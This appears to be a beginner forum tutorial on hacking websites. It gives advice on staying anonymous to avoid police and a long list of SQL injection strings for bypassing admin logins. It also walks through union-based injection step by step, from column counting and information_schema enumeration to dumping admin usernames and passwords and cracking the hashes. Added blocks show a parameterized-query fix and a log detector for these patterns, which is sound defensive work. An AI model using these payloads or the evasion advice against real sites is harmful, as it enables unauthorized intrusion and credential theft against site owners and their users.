Hello everyone, this is a tut about hacking. I will try to make it easy and detailed; if I typed anything wrong please correct me
at first I must say thanks to everyone who helped me learn a lot about hacking
vishal, almas, manjot, parth, ghosty bro and a lot more who give me every advice I need
in this tut we gonna learn about
1-what is the hacker
2-how to be anonymous
3-SQL injection
------------------------------------------------------------------
1-what is the hacker
hacker
this is someone who wants to break your security system to get something from your website or computer, or just someone who wants to let you know, in his own way, that your security is shit
and there are 3 kinds of hackers
Code:
1- white hat hacker
2- gray hat hacker
3- black hat hacker
we're not gonna talk a lot about this, it's just to let you know :)
-----------------------------------------------------------
2- how to be anonymous
don't try to hack into a system without being anonymous or you gonna get caught by the police. okay, how to do that?
well it's easy to be anonymous, you have to do these steps and you gonna disappear
Code:
1- use VPS or use RDP or use proxy; I prefer to use all of them at the same time, this gonna make you anonymous
2- don't open any of your personal things (like your own Facebook, Twitter, e-mail) or you gonna be in big trouble
3- don't tell anyone about your real identity (a lot of hackers work together for years and they don't even know if they talk to a man or a woman XD but this is how it works)
if you did these steps you gonna be anonymous
---------------------------------------------------------------------
part 3 SQL Injection
well I'm not gonna add everything now cuz I'm still learning every day, so excuse me if I type something wrong + excuse me for my bad English :)
how to inject the admin page (or how to bypass it)
well, when I was learning, this is the first thing I got to know about SQLi, so I must tell you it's not working with all websites but you gonna find it useful
if we have a site
Code:
www.site.com/admin.php
now we gonna have two boxes (username, password)
what we gonna do is type a query that can be executed by the login page
we gonna type
at username box : admin or root
at password box :
we have a big list to try out, I'm sure one of them gonna work
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
credits go to Zer0Freak Topic
okay, this is one way out of a lot of ways to break into a website
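Why those strings work, and what stops them, as an added example (not code from this tut or from any real site): a login check that builds its SQL by pasting the form fields together, next to the same check with a parameterized query. It assumes a made-up users table in an in-memory SQLite DB standing in for the site's MySQL; the three attempts are taken from the list above.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's user table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the example short; real sites store a salted hash.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # The fields are pasted into the SQL text, so a quote in the input ends
    # the string literal and whatever follows is parsed as SQL.
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders send the values separately from the SQL text, so the
    # quote stays data and is only ever compared literally.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# (username, password) pairs using strings from the list above
ATTEMPTS = [
    ("admin", "' or '1'='1"),
    ("admin", "' or 0=0 --"),
    ("admin' --", "anything"),
]

def compare(db):
    """Return {attempt: (concatenated_result, parameterized_result)}."""
    return {a: (login_vulnerable(db, *a), login_parameterized(db, *a)) for a in ATTEMPTS}

if __name__ == "__main__":
    db = make_db()
    for attempt, (vuln, safe) in compare(db).items():
        print(f"{attempt!r:32} concatenated={vuln}  parameterized={safe}")
```
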
---------------------------------------------------------
now we gonna learn another way, it's more than good to pwn a website
it's union-based injection
okay, now we have a website like this
Code:
www.site.com/buy.php?category=10
to know if this site is vulnerable or not we gonna add (') at the end of the URL
Code:
www.site.com/buy.php?category=10'
well, there are a lot of errors that may appear but we gonna work on this error
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
if we got this error then I'm sure the site is vulnerable, let's start to break it
to make sure, we gonna add
Code:
order by a--
well, this query lets us find out the number of columns. oh btw "a" = the number of columns that we're trying to find. let's see how it works
Code:
www.site.com/buy.php?category=10 order by 20--
if we have an error like this
Unknown column '20'
then it's the wrong number of columns, so let's try fewer than 20
Code:
www.site.com/buy.php?category=10 order by 15--
no error; let's make sure that we have the right number of columns
Code:
www.site.com/buy.php?category=10 order by 16--
error, so the right number is 15. now we know the number of columns and we need to use it
so let's use union select
how it works: union select lets us add the results of our own select to the results of the page's query
let's see how it works
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
now the page gonna show us some numbers; these numbers are the (vulnerable columns)
but which of these numbers is the right one to inject? well let's say you saw this
Code:
12
5
4
you gonna inject the number at the top
so now we need to know the version of the DB; we gonna type
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,@@version,13,14,15--
you will replace the vulnerable column with the @@version statement like I did
so the page gonna show you this
Code:
5.1.61-0
or whatever the DB version is
Note: if you find a DB version less than 5 then leave the site alone cuz you are not able to inject it; I'm gonna make a tut about how to guess the tables of DB versions less than 5
now we gonna use group_concat, this lets you collect all the info you need, so let's see how it works
we gonna try to get the table names with group_concat
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 from information_schema.tables where table_schema=database()--
we added this after the last column
Code:
from information_schema.tables where table_schema=database()--
and the page gonna show us the table names
Code:
table,tableadmin,tableup,phonenumbers,table,website
now we've got the website's table names. now we have to find the table that has the admin info, that means we gonna try to get into (tableadmin)
now we gonna replace group_concat(table_name) with group_concat(column_name)
and replace from information_schema.tables where table_schema=database()--
with from information_schema.columns where table_name=0x
okay, now our syntax gonna be like this
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15 from information_schema.columns where table_name=0x
we replaced database() with 0x cuz the 0x prefix marks the value as hex so the DB can read it
now we gonna add the table name, but in hex, so it gonna be like this
7461626c6561646d696e
to convert to hex use this website
Code:
http://www.swingnote.com
now we've got the columns from the admin table; we got
Code:
id,username,password
now we need to extract them to get all the info we need to log in
so we gonna replace group_concat(column_name) with group_concat(id,username,password)
and at the end we gonna replace
Code:
from information_schema.columns where table_name=0x7461626c6561646d696e
with
Code:
from tableadmin--
now we see on the page the user id, username and password
1:admin:admin
if we got a hashed password then use
http://www.md5.net
to crack it, and there are a lot more
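From the defender's side, the union-based sequence above leaves a clear trail in the web server's access log. This added example (not part of the original tut) URL-decodes each logged query string and labels the stages it sees per client; the log lines, IPs, paths and stage names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stages of the union-based sequence, matched on the URL-decoded query string.
STAGES = [
    ("quote_probe",  re.compile(r"'\s*(&|$)")),
    ("order_by",     re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_read", re.compile(r"@@version", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]
# Common log format: client, two ids, [time], "METHOD URI PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+) [^"]*" \d{3}')

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /buy.php?category=10%27 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /buy.php?category=10%20order%20by%2020-- HTTP/1.1" 200 498
203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /buy.php?category=10%20union%20select%201,2,3,@@version-- HTTP/1.1" 200 730
203.0.113.7 - - [01/Jan/2024:10:00:52 +0000] "GET /buy.php?category=10+union+select+1,group_concat(table_name)+from+information_schema.tables-- HTTP/1.1" 200 910
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /buy.php?category=10 HTTP/1.1" 200 2048
198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 1024
"""

def scan(log_text):
    """Return {client_ip: distinct stage labels in the order first seen}."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m["uri"]:
            continue
        # Logs hold the encoded form (%20, +, %27); decode before matching.
        query = unquote_plus(m["uri"].split("?", 1)[1])
        for label, rx in STAGES:
            if rx.search(query) and label not in hits.get(m["ip"], []):
                hits.setdefault(m["ip"], []).append(label)
    return hits

def alerts(log_text, min_stages=2):
    """Clients that hit several distinct stages: a probing sequence, not one odd request."""
    return {ip: s for ip, s in scan(log_text).items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, stages in alerts(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

The benign `q=order by phone` search in the sample is not flagged because the `order_by` pattern requires a column number after it.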
I hope you like this tut guys, and sorry for my bad English
waiting for your comments